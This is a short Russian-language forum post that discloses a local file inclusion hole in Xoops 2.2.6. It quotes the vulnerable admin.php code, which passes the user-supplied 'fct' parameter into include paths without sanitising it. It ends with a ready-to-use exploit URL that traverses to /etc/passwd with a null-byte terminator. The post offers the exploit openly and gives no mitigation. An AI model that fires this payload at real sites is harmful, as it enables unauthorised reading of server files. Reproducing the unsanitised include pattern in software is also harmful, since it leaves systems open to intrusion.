| [underwater] |
13.11.2009 00:51 |
LFI[Xoops 2.2.6]
Под руку попалась эта версия.
Смотри исходники system/admin.php:
Код:
<?php
if (isset($_POST['fct'])) {
$fct = trim($_POST['fct']);
}
if (isset($_GET['fct'])) {
$fct = trim($_GET['fct']);
}
$xoopsOption['pagetype'] = "admin";
include "../../mainfile.php";
if (!$xoopsUser) {
redirect_header(XOOPS_URL."/user.php", 3, _AD_NORIGHT);
}
include XOOPS_ROOT_PATH."/include/cp_functions.php";
include_once XOOPS_ROOT_PATH."/modules/system/constants.php";
$error = false;
if (isset($fct) && $fct != '') {
if (file_exists(XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php")) {
if (file_exists(XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php")) {
include XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php";
} elseif (file_exists(XOOPS_ROOT_PATH."/modules/system/language/english/admin/".$fct.".php")) {
...
}
include XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php";
...
Експлоит:
Код:
http://site.com/modules/system/admin.php?fct=../../../../../../../etc/passwd%00
|
